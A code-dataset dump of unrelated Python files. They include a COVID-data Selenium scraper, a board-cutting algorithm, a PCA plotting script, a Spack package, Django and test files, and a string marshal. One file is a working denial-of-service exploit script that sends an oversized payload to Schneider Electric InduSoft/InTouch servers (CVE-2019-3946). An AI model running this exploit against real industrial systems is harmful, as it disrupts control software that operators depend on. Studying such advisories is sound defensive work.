vals = [x.text for x in segment.find_elements_by_xpath('.//*') if '\n' not in x.text]
if table[1] == "Table 1":
if len(vals) % 7 != 0:
raise Exception("Unequal number of columns")
num_counties = len(vals)/7
sum_county += num_counties
cols = []
col = []
count = 0
for val in vals:
count += 1
col.append(val)
if count == num_counties:
count = 0
cols.append(col)
col = []
for col in cols:
if len(col) != num_counties:
raise Exception("Uneven number of values")
for county, active, rec, conf, prob, test, death in zip(cols[0], cols[1], cols[2], cols[3], cols[4], cols[5], cols[6]):
if county in county_list:
continue
ct = {
"County Name": county,
"# Confirmatory Lab Tests": (test).replace(",",""),
"Total Probable Cases": (prob).replace(",",""),
"Total Confirmed Cases": (conf).replace(",",""),
"Total Active Cases": (active).replace(",",""),
"Total Recovered": (rec).replace(",",""),
"Total Deaths: ": (death).replace(",",""),
"Scrape Time": now
}
out_county.append(ct)
county_list.append(county)
# elif table[1] == "Table 2":
# if len(vals) % 4 != 0:
# raise Exception("Unequal number of columns")
# num_counties = len(vals)/4
# sum_county += num_counties
# cols = []
# col = []
# count = 0
# for val in vals:
# count += 1
# col.append(val)
# if count == num_counties:
# count = 0
# cols.append(col)
# col = []
# for col in cols:
# if len(col) != num_counties:
# raise Exception("Uneven number of values")
# for f_cases, f_tests, m_cases, m_tests in zip(cols[0], cols[1], cols[2], cols[3]):
# out_county[idx]["Total Cases: Female"] = f_cases.replace(",","")
# out_county[idx]["Total Confirmatory Tests: Female"] = f_tests.replace(",","")
# out_county[idx]["Total Cases: Male"] = m_cases.replace(",","")
# out_county[idx]["Total Confirmatory Tests: Male"] = m_tests.replace(",","")
# idx += 1
# elif table[1] == "Table 3":
# if len(vals) % 3 != 0:
# raise Exception("Unequal number of columns")
# num_counties = len(vals)/3
# sum_county += num_counties
# cols = []
# col = []
# count = 0
# for val in vals:
# count += 1
# col.append(val)
# if count == num_counties:
# count = 0
# cols.append(col)
# col = []
# for col in cols:
# if len(col) != num_counties:
# raise Exception("Uneven number of values")
# for black, other, white in zip(cols[0], cols[1], cols[2]):
# # out_county[idx]["% Cases Race/Ethnicity: Unknown"] = unk.replace("%","")
# out_county[idx]["% Cases Race/Ethnicity: Black"] = black.replace("%","")
# out_county[idx]["% Cases Race/Ethnicity: Other"] = other.replace("%","")
# out_county[idx]["% Cases Race/Ethnicity: White"] = white.replace("%","")
# out_county[idx]["Scrape Time"] = now
# idx += 1
# if sum_county != 55:
# raise Exception("Unexpected number of counties: " + str(sum_county))
return out_county, county_list
def run_WV(args):
# run_hist()
# exit()
# Parameters
raw_name = '../WV/raw'
data_county = '../WV/data/data_county.csv'
now = str(datetime.now())
# Using Selenium
# driver = webdriver.Safari()
driver = webdriver.Chrome(executable_path="andrew/ChromeDriver/chromedriver.exe")
driver.maximize_window()
driver.get("https://dhhr.wv.gov/COVID-19/Pages/default.aspx")
time.sleep(7)
frame = driver.find_element_by_xpath('//*[@id="responsive"]/iframe')
driver.execute_script("return arguments[0].scrollIntoView(true);", frame)
driver.switch_to.frame(frame)
time.sleep(2)
out_county = []
# Get county data
driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-group[9]/transform/div/div[2]/visual-container-modern[2]/transform/div/div[3]/div/visual-modern/div/button').click()
time.sleep(3)
driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[11]/transform/div/div[3]/div/visual-modern/div/button').click()
time.sleep(3)
table1_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[1]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 1')
# table2_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[2]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 2')
# table3_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[3]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 3')
# Raw
driver.save_screenshot(raw_name + "/county1_" + now + ".png")
tables = [table1_div]
county_list = []
out_county, county_list = get_data(out_county, tables, county_list)
driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[1]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[2]/div/div[1]/div').click()
time.sleep(3)
# Raw
driver.save_screenshot(raw_name + "/county2_" + now + ".png")
table1_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[1]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 1')
# table2_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[2]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 2')
# table3_div = (driver.find_elements_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[3]/transform/div/div[3]/div/visual-modern/div/div/div[2]/div[1]/div[4]/div/*'), 'Table 3')
tables = [table1_div]
out_county, county_list = get_data(out_county, tables, county_list)
if len(county_list) != 55:
raise Exception("Did not collect all counties")
for county in out_county:
fields = sorted([x for x in county])
exists = os.path.exists(data_county)
with open(data_county, "a") as fp:
writer = csv.writer(fp)
if not exists:
writer.writerow(fields)
writer.writerow([county[x] for x in fields])
# # Get Statewide
# out = {}
# driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[4]/transform/div/div[3]/div/visual-modern/div/button').click()
# time.sleep(5)
# out["Total Confirmed Cases"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[14]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# out["Total Probable Cases"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[16]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# out["Total Deaths"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[35]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# out["Total Recovered Cases"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[18]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# out["Total Active Cases"] = (driver.find_element_by_xpath('//*[@id="pvExplorationHost"]/div/div/exploration/div/explore-canvas-modern/div/div[2]/div/div[2]/div[2]/visual-container-repeat/visual-container-modern[19]/transform/div/div[3]/div/visual-modern/div/svg/g[1]/text/tspan').text).replace(",","")
# print(out)
# Get Hospital (Daily confirmed hosp, confirmed icu, confirmed vent)
if __name__ == '__main__':
run_WV({})
|
StarcoderdataPython
|
3550222
|
<filename>ArraysAndSorting/CuttingBoards.py
# Importing standard libraries
import sys
'''
Produces mincost for the cuts. Follows merge sort's merge procedure after
sorting the arrays according to the cost (in descending order). Also as the
elements are merged, corresponding counts are merged (horizontal or vertical)
and while incrementing the cost, we take note and increment it by the formula
taking into consideration number of segments the cut is passing through.
Algorithm operates with a greedy strategy. Most Cost first approach.
Time Complexity : O(M+N)
Note : (A + B) % C = ( A % C + B % C ) % C
'''
def getMinCost(mCost,nCost):
moduloCon = 1000000000 + 7
mCuts = 0
nCuts = 0
mCost.sort()
mCost.reverse()
nCost.sort()
nCost.reverse()
mCosti = 0
nCosti = 0
totalCost = 0
while( mCosti < len(mCost) and nCosti < len(nCost) ):
if(mCost[mCosti] > nCost[nCosti]):
modInit = totalCost % moduloCon + mCost[mCosti]*(nCuts + 1) % moduloCon
totalCost = ( modInit ) % moduloCon
mCuts += 1
mCosti += 1
else:
modInit = totalCost % moduloCon + nCost[nCosti]*(mCuts + 1) % moduloCon
totalCost = modInit % moduloCon
nCuts += 1
nCosti += 1
while( mCosti < len(mCost) ):
modInit = totalCost % moduloCon + mCost[mCosti]*(nCuts + 1) % moduloCon
totalCost = modInit % moduloCon
mCuts += 1
mCosti += 1
while( nCosti < len(nCost) ):
modInit = totalCost % moduloCon + nCost[nCosti]*(mCuts + 1) % moduloCon
totalCost = modInit % moduloCon
nCuts += 1
nCosti += 1
return totalCost
'''
Main function for the program. Delegates the worki to getMinCost
'''
if __name__ == "__main__":
t = int(sys.stdin.readline().rstrip())
for i in range(t):
[m,n] = [int(x) for x in sys.stdin.readline().rstrip().split()]
mCost = [int(x) for x in sys.stdin.readline().rstrip().split()]
nCost = [int(x) for x in sys.stdin.readline().rstrip().split()]
minCost = getMinCost(mCost,nCost)
print minCost
|
StarcoderdataPython
|
11203834
|
"""
Scematic Diagram of PCA
-----------------------
Figure 7.2
A distribution of points drawn from a bivariate Gaussian and centered on the
origin of x and y. PCA defines a rotation such that the new axes (x' and y')
are aligned along the directions of maximal variance (the principal components)
with zero covariance. This is equivalent to minimizing the square of the
perpendicular distances between the points and the principal components.
"""
# Author: <NAME>
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.patches import Ellipse
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
#------------------------------------------------------------
# Set parameters and draw the random sample
np.random.seed(42)
r = 0.9
sigma1 = 0.25
sigma2 = 0.08
rotation = np.pi / 6
s = np.sin(rotation)
c = np.cos(rotation)
X = np.random.normal(0, [sigma1, sigma2], size=(100, 2)).T
R = np.array([[c, -s],
[s, c]])
X = np.dot(R, X)
#------------------------------------------------------------
# Plot the diagram
fig = plt.figure(figsize=(5, 5), facecolor='w')
ax = plt.axes((0, 0, 1, 1), xticks=[], yticks=[], frameon=False)
# draw axes
ax.annotate(r'$x$', (-r, 0), (r, 0),
ha='center', va='center',
arrowprops=dict(arrowstyle='<->', color='k', lw=1))
ax.annotate(r'$y$', (0, -r), (0, r),
ha='center', va='center',
arrowprops=dict(arrowstyle='<->', color='k', lw=1))
# draw rotated axes
ax.annotate(r'$x^\prime$', (-r * c, -r * s), (r * c, r * s),
ha='center', va='center',
arrowprops=dict(color='k', arrowstyle='<->', lw=1))
ax.annotate(r'$y^\prime$', (r * s, -r * c), (-r * s, r * c),
ha='center', va='center',
arrowprops=dict(color='k', arrowstyle='<->', lw=1))
# scatter points
ax.scatter(X[0], X[1], s=25, lw=0, c='k', zorder=2)
# draw lines
vnorm = np.array([s, -c])
for v in (X.T):
d = np.dot(v, vnorm)
v1 = v - d * vnorm
ax.plot([v[0], v1[0]], [v[1], v1[1]], '-k')
# draw ellipses
for sigma in (1, 2, 3):
ax.add_patch(Ellipse((0, 0), 2 * sigma * sigma1, 2 * sigma * sigma2,
rotation * 180. / np.pi,
ec='k', fc='gray', alpha=0.2, zorder=1))
ax.set_xlim(-1, 1)
ax.set_ylim(-1, 1)
plt.show()
|
StarcoderdataPython
|
4930612
|
# __init__.py for python to treat folder as module
|
StarcoderdataPython
|
21679
|
#!/usr/bin/env python3
'''
The MIT License (MIT)
Copyright (c) 2014 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def asdata(obj, asdata):
if isinstance(obj, Data):
return obj.asdata(asdata)
elif isinstance(obj, str):
return obj
elif hasattr(obj, '_asdict'):
return asdata(obj._asdict(), asdata)
elif isinstance(obj, dict):
return dict((k, asdata(v, asdata)) for (k, v) in obj.items())
else:
try:
return list(asdata(child, asdata) for child in obj)
except:
return obj
class Data:
def asdata(self, asdata = asdata):
return dict((k, asdata(v, asdata)) for (k, v) in self.__dict__.items())
def __repr__(self):
return self.asdata().__repr__()
|
StarcoderdataPython
|
6626922
|
<gh_stars>1-10
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by <NAME>, <EMAIL>, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Openexr(Package):
"""OpenEXR Graphics Tools (high dynamic-range image file format)"""
homepage = "http://www.openexr.com/"
url = "https://savannah.nongnu.org/download/openexr/openexr-2.2.0.tar.gz"
version('2.2.0', 'b64e931c82aa3790329c21418373db4e')
version('2.1.0', '33735d37d2ee01c6d8fbd0df94fb8b43')
version('2.0.1', '4387e6050d2faa65dd5215618ff2ddce')
version('1.7.0', '27113284f7d26a58f853c346e0851d7a')
version('1.6.1', '11951f164f9c872b183df75e66de145a')
version('1.5.0', '55342d2256ab3ae99da16f16b2e12ce9')
version('1.4.0a', 'd0a4b9a930c766fa51561b05fb204afe')
version('1.3.2', '1522fe69135016c52eb88fc7d8514409')
variant('debug', default=False,
description='Builds a debug version of the libraries')
depends_on('pkgconfig', type='build')
depends_on('ilmbase')
def install(self, spec, prefix):
configure_options = ['--prefix={0}'.format(prefix)]
if '+debug' not in spec:
configure_options.append('--disable-debug')
configure(*configure_options)
make('install')
|
StarcoderdataPython
|
3507733
|
webpageTokenUrls = [
('ahj-set-maintainer', {}),
('ahj-remove-maintainer', {}),
('create-api-token', {}),
('edit-review', {}),
('edit-update', {}),
('edit-deletion', {}),
('edit-addition', {}),
('user-update', {}),
('active-user-info', {}),
('comment-submit', {}),
('djoser:user-list', {}),
('djoser-authtoken:login', {}),
('djoser-authtoken:logout', {}),
('confirm-reset-password', {})
]
apiTokenUrls = [
('ahj-public', {}),
('ahj-geo-address', {}),
('ahj-geo-location', {}),
]
noAuthTokenUrls = [
('ahj-private', {}),
('single_ahj', {}),
('edit-list', {}),
('user-edits', {}),
('user-comments', {}),
('single-user-info', {'username': 'test'}),
('form-validator', {}),
('data-map', {}),
('data-map-polygon', {}),
('send-support-email', {}),
('form-validator', {})
]
|
StarcoderdataPython
|
9622653
|
import math
import vector
import parametrize_from_file
from pytest import approx
from voluptuous import Schema, Optional
from parametrize_from_file.voluptuous import Namespace
with_math = Namespace('from math import *')
with_vec = with_math.fork('from vector import *')
@parametrize_from_file(
schema=Schema({
'angle': with_math.eval,
Optional('unit', default='deg'): str,
Optional('magnitude', default='1'): with_math.eval,
'expected': with_vec.eval,
}),
)
def test_from_angle(angle, unit, magnitude, expected):
actual = vector.from_angle(angle, unit=unit, magnitude=magnitude)
assert actual.x == approx(expected.x)
assert actual.y == approx(expected.y)
|
StarcoderdataPython
|
6662925
|
from __future__ import annotations
from dataclasses import dataclass
import glob
from pathlib import Path
from typing import Callable, Generic, List, Tuple, TypeVar, Union, Optional
from kgdata.spark import get_spark_context
from sm.misc import deserialize_byte_lines, deserialize_lines, identity_func
from tqdm import tqdm
V = TypeVar("V")
@dataclass
class Dataset(Generic[V]):
# pattern to files (e.g., /*.gz)
file_pattern: Union[str, Path]
deserialize: Callable[[str], V]
filter: Optional[Callable[[str], bool]] = None
# whether the deserialize function is an identity function
# only happens when is this a list of string
is_deser_identity: bool = False
@staticmethod
def string(file_pattern: Union[str, Path]) -> Dataset[str]:
return Dataset(
file_pattern, deserialize=identity_func, filter=None, is_deser_identity=True
)
def get_files(self) -> List[str]:
return glob.glob(str(self.file_pattern))
def get_rdd(self):
rdd = get_spark_context().textFile(str(self.file_pattern))
if self.filter is not None:
rdd = rdd.filter(self.filter)
if not self.is_deser_identity:
return rdd.map(self.deserialize)
return rdd
def get_dict(self: Dataset[Tuple[str, str]], rstrip: bool = True):
assert self.filter is None, "Does not support filtering for non-rdd usage yet."
output = {}
if rstrip:
for file in tqdm(self.get_files(), desc="read dataset"):
for line in deserialize_lines(file):
k, v = self.deserialize(line.rstrip())
output[k] = v
else:
for file in tqdm(self.get_files(), desc="read dataset"):
for line in deserialize_lines(file):
k, v = self.deserialize(line)
output[k] = v
return output
|
StarcoderdataPython
|
8161240
|
<reponame>bate/c3nav<gh_stars>1-10
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-05-10 13:30
from __future__ import unicode_literals
import c3nav.mapdata.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mapdata', '0069_auto_20170510_1329'),
]
operations = [
migrations.CreateModel(
name='Point',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('geometry', c3nav.mapdata.fields.GeometryField(geomtype='point')),
('space', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='points', to='mapdata.Space', verbose_name='space')),
],
options={
'verbose_name': 'Point',
'verbose_name_plural': 'Points',
'default_related_name': 'points',
},
),
]
|
StarcoderdataPython
|
55000
|
# flake8: noqa
__version__ = "0.1.4"
from .quantity_array import QuantityArray
from .quantity_set import QuantitySet
|
StarcoderdataPython
|
1904710
|
##
# Exploit Title: Schneider Electric InduSoft/InTouch DoS
# Date: 06/11/2019
# Exploit Author: <NAME>
# CVE : CVE-2019-3946
# Advisory: https://www.tenable.com/security/research/tra-2018-07
# Affected Vendors/Device/Firmware:
# - InduSoft Web Studio v8.1 or prior
# - InTouch Machine Edition 2017 v8.1 or prior
##
import socket, argparse, binascii
from struct import *
parser = argparse.ArgumentParser()
parser.add_argument("target_host", help="InduSoft host")
parser.add_argument("target_port", help="InduSoft port (ie. 1234)", type=int)
args = parser.parse_args()
host = args.target_host
port = args.target_port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect((host, port))
data = '\x02\x57\x03\x02\x32' #
data += 'A' * 0x500 #
data += '\x09\x0a\x03' #
s.send(data)
res = s.recv(1024)
print binascii.hexlify(res)
|
StarcoderdataPython
|
346639
|
<gh_stars>0
# encoding: utf-8
__author__ = "<NAME>"
# Taken and adapted from: https://github.com/wdika/NeMo/edit/main/tests/collections/common/loss_inputs.py
from dataclasses import dataclass
import numpy as np
import torch
from tests.collections.common.pl_utils import NUM_BATCHES
@dataclass(frozen=True)
class LossInput:
"""
The input for ``mridc.collections.common.metrics.GlobalAverageLossMetric`` metric tests.
Args:
loss_sum_or_avg: a one dimensional float tensor which contains losses for averaging. Each element is either a
sum or mean of several losses depending on the parameter ``take_avg_loss`` of the
``nemo.collections.common.metrics.GlobalAverageLossMetric`` class.
num_measurements: a one dimensional integer tensor which contains number of measurements which sums or average
values are in ``loss_sum_or_avg``.
"""
loss_sum_or_avg: torch.Tensor
num_measurements: torch.Tensor
NO_ZERO_NUM_MEASUREMENTS = LossInput(
loss_sum_or_avg=torch.rand(NUM_BATCHES) * 2.0 - 1.0,
num_measurements=torch.randint(1, 100, (NUM_BATCHES,)),
)
SOME_NUM_MEASUREMENTS_ARE_ZERO = LossInput(
loss_sum_or_avg=torch.rand(NUM_BATCHES) * 2.0 - 1.0,
num_measurements=torch.cat(
(
torch.randint(1, 100, (np.floor_divide(NUM_BATCHES, 2)), dtype=torch.int32),
torch.zeros(NUM_BATCHES - np.floor_divide(NUM_BATCHES, 2), dtype=torch.int32),
)
),
)
ALL_NUM_MEASUREMENTS_ARE_ZERO = LossInput(
loss_sum_or_avg=torch.rand(NUM_BATCHES) * 2.0 - 1.0,
num_measurements=torch.zeros(NUM_BATCHES, dtype=torch.int32),
)
|
StarcoderdataPython
|
6608028
|
<reponame>DudeNr33/pyinstaller-versionfile<filename>test/unittest/test_writer.py
"""
Author: <NAME>
Unit tests for pyinstaller_versionfile.writer.
"""
try:
from unittest import mock
except ImportError:
import mock # Python 2.7
import pytest
from pyinstaller_versionfile.writer import Writer
from pyinstaller_versionfile.exceptions import InternalUsageError, UsageError
TEST_VERSION = "0.8.1.5"
TEST_COMPANY_NAME = "TestCompany"
TEST_FILE_DESCRIPTION = "TestFileDescription"
TEST_INTERNAL_NAME = "TestInternalName"
TEST_LEGAL_COPYRIGHT = "TestLegalCopyright"
TEST_ORIGINAL_FILENAME = "TestOriginalFilename"
TEST_PRODUCT_NAME = "TestProductName"
@pytest.fixture(name="metadata_mock")
def fixture_metadata_mock():
"""
Create a mock object for a MetaData instance that can be passed to the writer class.
Pre-populate the 'to_dict' method to return valid content.
The return value is taken from the 'params' attribute on the mock and can be changed easily for testing purposes.
"""
metadata_mock = mock.MagicMock()
metadata_mock.params = {
"Version": TEST_VERSION,
"CompanyName": TEST_COMPANY_NAME,
"FileDescription": TEST_FILE_DESCRIPTION,
"InternalName": TEST_INTERNAL_NAME,
"LegalCopyright": TEST_LEGAL_COPYRIGHT,
"OriginalFilename": TEST_ORIGINAL_FILENAME,
"ProductName": TEST_PRODUCT_NAME,
}
metadata_mock.to_dict.return_value = metadata_mock.params
return metadata_mock
@pytest.fixture(name="prepared_writer")
def fixture_writer(metadata_mock):
"""
Writer object with already rendered content.
"""
writer = Writer(metadata_mock)
writer.render()
return writer
@pytest.mark.parametrize(
"attribute,value", [
("CompanyName", TEST_COMPANY_NAME),
("FileDescription", TEST_FILE_DESCRIPTION),
("FileVersion", TEST_VERSION),
("InternalName", TEST_INTERNAL_NAME),
("LegalCopyright", TEST_LEGAL_COPYRIGHT),
("OriginalFilename", TEST_ORIGINAL_FILENAME),
("ProductName", TEST_PRODUCT_NAME),
("ProductVersion", TEST_VERSION)
]
)
def test_render_valid_parameters_creates_correct_content(metadata_mock, attribute, value):
"""
Check rendering of file content if provided values are complete and correct.
"""
writer = Writer(metadata=metadata_mock)
writer.render()
assert "StringStruct(u'{}', u'{}')".format(attribute, value) in writer._content # pylint: disable=protected-access
@pytest.mark.parametrize(
"deleted_attribute",
# pylint: disable=duplicate-code
[
"Version",
"CompanyName",
"FileDescription",
"InternalName",
"LegalCopyright",
"OriginalFilename",
"ProductName",
]
)
def test_render_missing_parameter_raises_internalusageerror(metadata_mock, deleted_attribute):
"""
If any of the required parameters is missing when rendering the file content, a KeyError shall be raised.
"""
del metadata_mock.params[deleted_attribute]
writer = Writer(metadata=metadata_mock)
with pytest.raises(InternalUsageError):
writer.render()
def test_save_without_rendering_before_raises_usage_error():
"""
Trying to write the versionfile to disk is pointless if the content has not been rendered yet.
Since these two actions have to be triggered by the caller, he must be informed if he forgets to render before
saving.
"""
writer = Writer(metadata=mock.Mock())
with pytest.raises(InternalUsageError):
writer.save("version_file.txt")
@pytest.mark.parametrize(
"filename",
[
"version_file.txt", # most common case
"versionfile", # no file ending
".versionfile", # leading dot
]
)
def test_save_valid_filepath_saves_content(prepared_writer, tmpdir, filename):
"""
If given a valid filepath, the contents shall be saved correctly.
"""
filepath = tmpdir / filename
prepared_writer.save(str(filepath))
assert filepath.read_text("utf-8") == prepared_writer._content # pylint: disable=protected-access
def test_save_file_exists_overwrites_file(prepared_writer, tmpdir):
"""
If the file already exists, it shall be overwritten.
"""
filepath = tmpdir / "already_exists.txt"
filepath.write_text("This is the previous content", "utf-8")
prepared_writer.save(str(filepath))
assert filepath.read_text("utf-8") == prepared_writer._content # pylint: disable=protected-access
def test_save_directory_passed_raises_usageerror(prepared_writer, tmpdir):
"""
If the value passed to 'save' is a directory, an IOError shall be raised.
"""
with pytest.raises(UsageError):
prepared_writer.save(str(tmpdir))
|
StarcoderdataPython
|
9690872
|
# -*- coding:utf-8 -*-
from re import sub
from itertools import islice
'''
如何调整字符串的文本格式
'''
# 将日志文件中的日期格式转变为美国日期格式mm/dd/yyyy
# 使用正则表达式模块中的sub函数进行替换字符串
with open("./log.log","r") as f:
for line in islice(f,0,None):
#print sub("(\d{4})-(\d{2})-(\d{2})",r"\2/\3/\1",line)
# 可以为每个匹配组起一个别名
print sub("(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})",r"\g<month>/\g<day>/\g<>",line)
|
StarcoderdataPython
|
128302
|
import config
from database import RedditOutfitsDatabase
from util_reddit import generate_thread_ids
'''
This script is ran according to Malefashionadvice's, Femalefashionadvice's, and Streetwear's weekly thread(s) schedules.
'''
def process_threads(thread_ids: list, database):
'''
Given a list of threads IDs, processes each one.
'''
for thread_id in thread_ids:
database.process_thread(thread_id)
database = RedditOutfitsDatabase(
'reddit_outfits', 'redditoutfits', config.redditoutfits_password)
# Retrieve most recent 25 thread IDs for each subreddit.
# By default retrieves 25 results.
malefashionadvice_thread_ids = generate_thread_ids(
'WAYWT', 'AutoModerator', 'malefashionadvice')
femalefashionadvice_thread_ids = generate_thread_ids(
'WAYWT', 'AutoModerator', 'femalefashionadvice')
streetwear_thread_ids = generate_thread_ids(
'WDYWT', 'AutoModerator', 'streetwear')
process_threads(malefashionadvice_thread_ids, database)
process_threads(femalefashionadvice_thread_ids, database)
process_threads(streetwear_thread_ids, database)
database.close()
|
StarcoderdataPython
|
6592198
|
from .base import Marshal, ConstReader, FixedSizer, EMPTY_CONTEXT, MinMax
from .errors import InstructError, InvalidValueError
from ._compat import pad
PADDING_DIRECTION_NONE = 0
PADDING_DIRECTION_RIGHT = 1
PADDING_DIRECTION_LEFT = 2
PADDING_DIRECTION_BOTH = 3
def _strip(obj, dir, padding):
if dir == PADDING_DIRECTION_NONE:
return obj
elif dir == PADDING_DIRECTION_RIGHT:
return obj.rstrip(padding)
elif dir == PADDING_DIRECTION_LEFT:
return obj.lstrip(padding)
else:
return obj.strip(padding)
def _pad(obj, size, dir, padding):
pad_len = size - len(obj)
if pad_len < 0:
raise InvalidValueError("fixed-size item length is expected to be of length %d or smaller but instead got %d (item=%s)" % (size, len(obj), repr(obj)))
elif pad_len == 0:
return obj
if dir == PADDING_DIRECTION_RIGHT or dir == PADDING_DIRECTION_BOTH:
return obj + padding[0] * pad_len
elif dir == PADDING_DIRECTION_LEFT:
return (padding[0] * pad_len) + obj
else:
# PADDING_DIRECTION_NONE
raise InvalidValueError("no padding specified but item length %d is smaller than required length %d (item=%s)" %
(len(obj), size, obj))
class VarSizeStringMarshal(Marshal):
def __init__(self, size_marshal, padding=b'\x00', padding_direction=PADDING_DIRECTION_RIGHT):
super(VarSizeStringMarshal, self).__init__()
self.size_marshal = size_marshal
self.padding = padding
self.padding_direction = padding_direction
def create_from_stream(self, stream, context=EMPTY_CONTEXT, *args, **kwargs):
buffer_len = self.size_marshal.create_from_stream(stream, context)
obj = stream.read(buffer_len)
if len(obj) < buffer_len:
raise InstructError("Expected to read %d bytes from stream but read only %d" % (buffer_len, len(obj)))
return _strip(obj, self.padding_direction, self.padding)
def write_to_stream(self, obj, stream, context=EMPTY_CONTEXT):
stripped_obj = _strip(obj, self.padding_direction, self.padding)
self.size_marshal.write_to_stream(len(stripped_obj), stream, context)
stream.write(stripped_obj)
def to_repr(self, obj, context=EMPTY_CONTEXT):
return repr(obj)
def sizeof(self, obj):
return self.size_marshal.sizeof(obj) + len(_strip(obj, self.padding_direction, self.padding))
def min_max_sizeof(self):
size_min_max = self.size_marshal.min_max_sizeof()
return MinMax(size_min_max.min, size_min_max.max + (1 << (size_min_max.max * 8)) - 1)
class PaddedStringMarshal(FixedSizer, VarSizeStringMarshal):
